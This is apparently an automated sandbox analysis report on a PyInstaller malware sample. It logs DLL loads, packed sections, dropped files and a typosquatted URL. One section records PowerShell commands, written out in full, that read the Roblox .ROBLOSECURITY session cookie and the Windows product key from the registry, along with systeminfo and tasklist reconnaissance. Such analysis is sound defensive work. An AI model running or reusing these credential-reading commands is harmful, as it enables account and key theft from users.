Source: C:\Windows\System32\netsh.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: slc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\tree.com	Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\tree.com	Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com	Section loaded: fsutilext.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\systeminfo.exe systeminfo

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\bound.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\16.0\Access\Capabilities\UrlAssociations

Source: El9HaBFrFM.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: El9HaBFrFM.exe

Static file information: File size 8278102 > 1048576

Source: El9HaBFrFM.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: El9HaBFrFM.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: El9HaBFrFM.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: El9HaBFrFM.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: El9HaBFrFM.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: El9HaBFrFM.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: El9HaBFrFM.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: El9HaBFrFM.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: El9HaBFrFM.exe, 00000001.00000002.2254958100.00007FFDFA9D7000.00000040.00000001.01000000.00000013.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\4mvljvuo\4mvljvuo.pdbhP, source: powershell.exe, 0000002E.00000002.1947586190.0000026CB8305000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\libcrypto-3.pdb\| source: El9HaBFrFM.exe, 00000001.00000002.2256002845.00007FFDFAFCA000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdbDD source: El9HaBFrFM.exe, 00000001.00000002.2255396012.00007FFDFAB35000.00000040.00000001.01000000.00000010.sdmp
Source:	Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL \|\| WITHIN_ARENA(temp->next)assertion failed: (char *)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) \|\| WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
Source:	Binary string: o.pdbE source: powershell.exe, 0000002E.00000002.2106834306.0000026CD013D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\4mvljvuo\4mvljvuo.pdb source: powershell.exe, 0000002E.00000002.1947586190.0000026CB8305000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: El9HaBFrFM.exe, 00000000.00000003.1683960250.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2261813551.00007FFE13344000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: El9HaBFrFM.exe, 00000001.00000002.2256002845.00007FFDFAF32000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: El9HaBFrFM.exe, 00000000.00000003.1683960250.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2261813551.00007FFE13344000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: El9HaBFrFM.exe, El9HaBFrFM.exe, 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp
Source:	Binary string: D:\a\1\b\libcrypto-3.pdb source: El9HaBFrFM.exe, El9HaBFrFM.exe, 00000001.00000002.2256002845.00007FFDFAFCA000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000053.00000002.2145961692.00007FF6D7F40000.00000002.00000001.01000000.00000022.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: El9HaBFrFM.exe, 00000001.00000002.2261083464.00007FFE13201000.00000040.00000001.01000000.0000000D.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: El9HaBFrFM.exe, 00000001.00000002.2261488219.00007FFE13301000.00000040.00000001.01000000.00000006.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: El9HaBFrFM.exe, El9HaBFrFM.exe, 00000001.00000002.2259608599.00007FFE11501000.00000040.00000001.01000000.00000011.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WA source: El9HaBFrFM.exe
Source:	Binary string: E:\trksyln\Coding\trksyln.net\repos\TGMacro\obj\Debug\TGMacro.pdb source: El9HaBFrFM.exe, 00000001.00000003.1710912781.0000025069359000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1711527664.0000025069462000.00000004.00000020.00020000.00000000.sdmp, bound.exe, 00000012.00000000.1715370001.0000026C525E2000.00000002.00000001.01000000.00000016.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: El9HaBFrFM.exe, 00000001.00000002.2261272243.00007FFE1322B000.00000040.00000001.01000000.00000008.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: El9HaBFrFM.exe, 00000001.00000002.2260891660.00007FFE130C1000.00000040.00000001.01000000.00000012.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: El9HaBFrFM.exe, 00000001.00000002.2261272243.00007FFE1322B000.00000040.00000001.01000000.00000008.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: El9HaBFrFM.exe, 00000001.00000002.2260707482.00007FFE11ED1000.00000040.00000001.01000000.00000009.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: El9HaBFrFM.exe, 00000001.00000002.2260219620.00007FFE11561000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: El9HaBFrFM.exe, 00000001.00000002.2260486128.00007FFE11EA1000.00000040.00000001.01000000.0000000A.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python313.pdb source: El9HaBFrFM.exe, 00000001.00000002.2258031629.00007FFDFB648000.00000040.00000001.01000000.00000004.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdb source: El9HaBFrFM.exe, El9HaBFrFM.exe, 00000001.00000002.2255396012.00007FFDFAB35000.00000040.00000001.01000000.00000010.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: El9HaBFrFM.exe, El9HaBFrFM.exe, 00000001.00000002.2259888394.00007FFE1152E000.00000040.00000001.01000000.0000000E.sdmp

Source: El9HaBFrFM.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: El9HaBFrFM.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: El9HaBFrFM.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: El9HaBFrFM.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: El9HaBFrFM.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

Source: VCRUNTIME140.dll.0.dr

Static PE information: 0x78BDDED1 [Sat Mar 11 17:01:05 2034 UTC]

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4mvljvuo\4mvljvuo.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4mvljvuo\4mvljvuo.cmdline"

Source: C:\Users\user\Desktop\El9HaBFrFM.exe

Code function: 1_2_00007FFDFA9E0350 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,

1_2_00007FFDFA9E0350

Source: python313.dll.0.dr	Static PE information: real checksum: 0x0 should be: 0x1cb64b
Source: _ctypes.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x1f35a
Source: unicodedata.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x46d69
Source: El9HaBFrFM.exe	Static PE information: real checksum: 0x7e87ac should be: 0x7e825f
Source: _bz2.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0xdba7
Source: libffi-8.dll.0.dr	Static PE information: real checksum: 0x0 should be: 0xa1d1
Source: _ssl.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x17cae
Source: sqlite3.dll.0.dr	Static PE information: real checksum: 0x0 should be: 0xa8f8a
Source: libcrypto-3.dll.0.dr	Static PE information: real checksum: 0x0 should be: 0x197f77
Source: _queue.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x11959
Source: _socket.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x1a226
Source: _decimal.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x1fcc8
Source: _hashlib.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0xdd74
Source: libssl-3.dll.0.dr	Static PE information: real checksum: 0x0 should be: 0x4330c
Source: _lzma.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x21293
Source: select.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x7797
Source: _sqlite3.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x15eca
Source: 4mvljvuo.dll.57.dr	Static PE information: real checksum: 0x0 should be: 0xb299

Source: VCRUNTIME140.dll.0.dr	Static PE information: section name: fothk
Source: VCRUNTIME140.dll.0.dr	Static PE information: section name: _RDATA
Source: libffi-8.dll.0.dr	Static PE information: section name: UPX2

Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFA93AC25 push rcx; ret	1_2_00007FFDFA93AC62
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFAAD4331 push rcx; ret	1_2_00007FFDFAAD4332
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FFDFB1027AE push rsp; iretd	1_2_00007FFDFB1027B9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FFD9A23D2A5 pushad ; iretd	6_2_00007FFD9A23D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FFD9A35564C push edi; iretd	6_2_00007FFD9A35565B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FFD9A35861B push ebx; ret	6_2_00007FFD9A35862A
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Code function: 18_2_00007FFD9A3300BD pushad ; iretd	18_2_00007FFD9A3300C1
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Code function: 18_2_00007FFD9A330875 push cs; retf	18_2_00007FFD9A3308FF
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Code function: 18_2_00007FFD9A330855 push cs; retf	18_2_00007FFD9A3308FF
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Code function: 18_2_00007FFD9A330900 push ss; ret	18_2_00007FFD9A33093F

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Persistence and Installation Behavior

AI detected suspicious URL

Source: Email

JoeBoxAI: AI detected Typosquatting in URL: URL: https://trksyln.net

Found pyInstaller with non standard icon

Source: C:\Users\user\Desktop\El9HaBFrFM.exe

Process created: "C:\Users\user\Desktop\El9HaBFrFM.exe"

Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75162\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75162\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75162\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75162\unicodedata.pyd	Jump to dropped file
